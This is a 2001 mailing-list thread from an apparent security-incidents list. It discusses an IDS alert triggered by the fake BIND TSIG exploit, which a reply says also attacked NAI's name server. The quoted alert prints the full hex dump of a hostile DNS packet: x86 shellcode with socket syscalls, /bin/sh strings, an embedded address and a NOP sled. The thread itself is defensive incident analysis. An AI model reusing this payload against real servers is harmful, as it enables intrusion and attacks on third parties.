Security Incidents: Re: Named TSIG exploit ?

From: Paul Cardon <paul_at_MOQUIJO.COM>
Date: Mon, 5 Feb 2001 16:48:52 -0500

The source ran the fake BIND TSIG exploit released on BUGTRAQ last week
using your system as the intended target. Pretty sad since it means
they were also (unknowingly?) attacking NAI's name server.

-paul

Mihai Moldovanu wrote:
>
> [**] IDS362 - MISC - Shellcode X86 NOPS-UDP [**]
> 02/01-09:31:30.076442 0:10:7B:40:91:C0 -> 0:1:2:F7:76:B8 type:0x800
> len:0x22A
> 141.85.31.233:1025 -> OurNameServer:53 UDP TTL:60 TOS:0x0 ID:0 DF
> Len: 520
> 00 D0 84 00 00 01 00 00 00 00 00 01 00 CD 80 83 ................
> C4 08 3D 04 00 18 01 7C 05 E8 15 00 00 00 E8 80 ..=....|........
> 00 00 00 E8 53 49 47 4E 41 54 55 52 45 E8 52 53 ....SIGNATURE.RS
> 41 00 00 EB 34 5E BB 01 00 00 00 89 F1 B8 66 00 A...4^........f.
> 00 00 CD 80 89 46 14 8D 46 30 89 46 18 31 C0 89 .....F..F0.F.1..
> 46 20 8D 46 0C 89 46 24 B8 66 00 00 00 BB 0B 00 F .F..F$.f......
> 00 00 8D 4E 14 CD 80 EB EF E8 C7 FF FF FF 02 00 ...N............
> 00 00 02 00 00 00 11 00 00 00 02 00 00 35 A1 45 .............5.E
> 03 96 FF FF FF FF EF FF FF FF 00 04 00 00 00 00 ................
> 00 00 02 5F 9A 80 10 00 00 00 2F 62 69 6E 2F 73 ..._....../bin/s
> 68 00 00 EB 37 5E 6A 11 6A 02 6A 02 6A 66 8D 05 h...7^j.j.j.jf..
> 61 00 00 00 CD 80 89 C2 6A 10 89 F0 50 31 C0 50 a.......j...P1.P
> 68 24 10 00 00 8D 46 0F 50 52 68 88 00 00 00 8D h$....F.PRh.....
> 05 85 00 00 00 CD 80 83 C4 1C EB DC E8 C4 FF FF ................
> FF 00 02 00 35 A1 45 03 96 E8 B1 FF FF FF 2F 62 ....5.E......./b
> 69 6E 2F 73 68 00 00 90 90 90 90 90 90 90 90 90 in/sh...........
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
>
> The shellcode inside the second packet is pretty strange. Can anyone
> take a deeper look at it?
Received on Feb 05 2001
